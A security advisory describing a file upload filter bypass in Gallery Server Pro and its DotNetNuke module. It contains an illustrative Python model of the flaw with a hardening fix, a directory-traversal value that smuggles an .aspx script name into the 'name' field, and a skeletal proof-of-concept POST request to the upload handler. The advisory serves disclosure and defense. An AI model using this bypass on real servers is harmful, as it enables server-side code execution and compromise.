Gallery Server Pro File Upload Filter Bypass

Type packetstorm
Reporter Drew Calcott
Modified 2013-05-14T00:00:00


Gallery Server Pro File Upload Filter Bypass  
Vendor Link:  
Gallery Server Pro is a media gallery that works both as a stand-alone  
application and as a module for DotNetNuke. The upload functionality of  
both the application and the DotNetNuke module has been found to be  
vulnerable to a bypass of the restrictions in the file upload filter.  
This permits a malicious authenticated user to upload arbitrary file  
types, including .NET scripts, allowing the execution of server-side code.  
Exploitation of this vulnerability requires an authenticated account with  
permission to upload files to a gallery, or an application / module  
configured to allow unauthenticated users to upload. The file type  
restrictions are applied only to the “filename” attribute of the multipart  
file part; the name under which the file is saved is taken from the  
separate “name” form field in the POST request, which is not filtered.  
Supplying a script filename in the “name” field therefore bypasses the  
upload restrictions, and including directory traversal sequences in that  
field causes the uploaded file to be saved within the webroot of the  
application / module.  
In the standalone application version of Gallery Server Pro, the IIS  
user does not have permission to write directly to the webroot of the  
application. Therefore, it is necessary to place the file within the  
“gs\mediaobjects\Samples” path as per the example below. Please note  
that the DotNetNuke module does not have these same restrictions by default.  
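The following Python is an added illustration, not code from the advisory or from Gallery Server Pro. It parses a constructed multipart body with the standard library and hands the fields to two hypothetical save routines: the first applies the extension check to the multipart “filename” attribute but writes the file under the separate “name” field, as described above; the second validates the name it actually writes and confines it to the upload directory. The upload directory, boundary and field values are assumptions, and paths use POSIX separators so the model runs anywhere.

```python
"""Model of the upload filter bypass described in the advisory.

Added example, not Gallery Server Pro's code. The directory names,
boundary and field values below are constructed for illustration.
"""
import email
import posixpath

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
# Hypothetical upload directory below the gallery's webroot.
UPLOAD_ROOT = "/inetpub/wwwroot/gallery/App_Data/uploads"

# Constructed request body: the "name" field carries a traversal string and
# a script extension, while the file part's filename passes the filter.
BOUNDARY = b"----constructedboundary1234"
BODY = (
    b"------constructedboundary1234\r\n"
    b'Content-Disposition: form-data; name="name"\r\n'
    b"\r\n"
    b"..\\..\\gs\\mediaobjects\\Samples\\malicious.aspx\r\n"
    b"------constructedboundary1234\r\n"
    b'Content-Disposition: form-data; name="file"; filename="malicious.jpg"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"<% ' placeholder for server-side code %>\r\n"
    b"------constructedboundary1234--\r\n"
)


def parse_multipart(boundary: bytes, body: bytes) -> dict:
    """Return the form fields, plus 'filename' and 'data' for the file part."""
    msg = email.message_from_bytes(
        b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n\r\n" + body
    )
    fields = {}
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        if part.get_filename():
            fields["filename"] = part.get_filename()
            fields["data"] = part.get_payload(decode=True)
        else:
            field = part.get_param("name", header="content-disposition")
            fields[field] = part.get_payload(decode=True).decode()
    return fields


def _to_posix(name: str) -> str:
    # IIS accepts both separators; normalise so traversal is visible either way.
    return name.replace("\\", "/")


def vulnerable_save(fields: dict, fs: dict) -> str:
    """The flaw: the extension check reads 'filename', the write uses 'name'."""
    if posixpath.splitext(fields["filename"])[1].lower() not in ALLOWED_EXT:
        raise ValueError("file type not allowed")
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, _to_posix(fields["name"])))
    fs[target] = fields["data"]  # fs is a dict standing in for the filesystem
    return target


def hardened_save(fields: dict, fs: dict) -> str:
    """Check the name that is actually written, then confine it to UPLOAD_ROOT."""
    name = posixpath.basename(_to_posix(fields["name"]))  # drop any directory part
    if not name or posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("file type not allowed")
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, name))
    if not target.startswith(UPLOAD_ROOT + "/"):
        raise ValueError("path escapes upload root")
    fs[target] = fields["data"]
    return target


if __name__ == "__main__":
    fields = parse_multipart(BOUNDARY, BODY)
    print("vulnerable wrote:", vulnerable_save(fields, {}))
    try:
        hardened_save(fields, {})
    except ValueError as exc:
        print("hardened rejected:", exc)
```

The hardened routine makes two independent decisions: it derives the extension from the name that will actually be written, not from a different client-supplied attribute, and it checks the resolved path against the upload root even after stripping directory components, so a later change to the name handling cannot silently reintroduce traversal.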
|Proof of Concept HTTP POST Request|  
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1  
Host: <vulnerablesite>  
Content-Length: 73459  
Content-Type: multipart/form-data;  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Disposition: form-data; name="name"  
Content-Disposition: form-data; name="file"; filename="malicious.jpg"  
Content-Type: application/octet-stream  
Malicious code here.  
The uploaded file will then be available on the affected server at:  
The vendor has released an update for all vulnerable versions of Gallery  
Server Pro and the related DotNetNuke module.  
The patch is available for download from the vendor’s website at:  